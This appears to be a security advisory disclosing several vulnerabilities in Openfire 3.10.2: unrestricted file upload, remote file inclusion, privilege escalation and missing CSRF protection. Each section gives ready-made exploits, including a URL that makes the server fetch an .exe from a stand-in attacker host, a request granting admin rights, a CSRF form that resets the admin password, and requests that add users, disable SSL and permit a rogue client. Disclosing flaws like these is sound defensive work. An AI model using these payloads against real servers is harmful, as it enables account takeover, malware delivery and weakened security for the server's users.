Openfire 3.10.2 - Multiple Vulnerabilities

### Product: Openfire 3.10.2 Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). #### Vulnerability Type: Unrestricted File Upload #### Vulnerability Details: Application specifies Plugin files (.jar) can be uploaded directly by using the form, however so can the following. ``` .exe .php .jsp .py .sh ``` #### Exploit code(s): * 1) choose some malicious file using the File browser * 2) click 'upload plugin' ``` http://localhost:9090/plugin-admin.jsp ``` Our malicious uploaded files will be stored under `/openfire/plugins` directory. #### Description: ``` Request Method(s): [+] POST Vulnerable Product: [+] Openfire 3.10.2 Vulnerable Parameter(s): [+] fileName Affected Area(s): [+] Server ``` ---------------------------------------------------------------------- ### Openfire 3.10.2 - Remote File Inclusion Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). #### Vulnerability Type: Remote File Inclusion #### Vulnerability Details: In `available-plugins.jsp` there is no validation for plugin downloads, allowing arbitrary file downloads from anywhere on the internet. On line 40: all that needs to be satisfied is the paramater is not null. ``` boolean downloadRequested = request.getParameter("download") != null; String url = request.getParameter("url"); ``` If the above condition check returns true, the application downloads whatever file you give it. line 54: ``` if (downloadRequested) { // Download and install new plugin updateManager.downloadPlugin(url); // Log the event webManager.logEvent("downloaded new plugin from "+url, null); } ``` #### Exploit code(s): 1) download arbitrary filez e.g. ``` http://localhost:9090/available-plugins.jsp?download=1&url=http://ghostofsin.abyss/abysmalgod.exe ``` Our RFI will be downloaded to`openfire\plugins` directory. ---------------------------------------------------------------------- ### Openfire 3.10.2 - Privilege Escalation #### Vendor: * www.igniterealtime.org/projects/openfire * www.igniterealtime.org/downloads/index.jsp #### Product: Openfire 3.10.2 Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). #### Vulnerability Type: Privilege escalation #### Vulnerability Details: No check is made when updating the user privileges, allowing regular user to become an admin. Escalation can be done remotely too if user is logged in as no CSRF token exist. #### Exploit code(s): Become admin! ``` http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&email=ghostofsin@abyss.com&isadmin=on ``` ### Openfire 3.10.2 - CSRF Vulnerabilities #### Product: Openfire 3.10.2 Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). #### Vulnerability Type: Cross site request forgery (CSRF) #### Vulnerability Details: No CSRF tokens exists allowing us to take malicious actions against the application. * change admin password. * add aribitrary users to the system * edit server settings e.g. turn off SSL. * Add rogue malicious clients with permit access (Allow all XMPP clients to connect) and more... #### Exploit code(s): * change admin password ``` <script> function doit(){ var e=document.getElementById('HELL') e.submit() } </script> <form id="HELL" action="http://localhost:9090/user-password.jsp" method="post"> <input type="text" name="username" value="admin" > <input type="text" name="password" value="abc123"> <input type="text" name="passwordConfirm" value="abc123" > <input type="password" name="update" value="Update+Password" > </form> ``` * add aribitrary users ``` http://localhost:9090/user-create.jsp?username=hyp3rlinx&name=hyp3rlinx&email=blasphemer@abyss.com&password=abc123&passwordConfirm=abc123&create=Create+User ``` * edit server settings & turn off SSL ``` http://localhost:9090/server-props.jsp?serverName=myserver&sslEnabled=false&save=Save+Properties ``` * add rogue malicious clients ``` http://localhost:9090/plugins/clientcontrol/permitted-clients.jsp?all=false&other=http%3A//maliciouso.com/666.exe&addOther=Add ```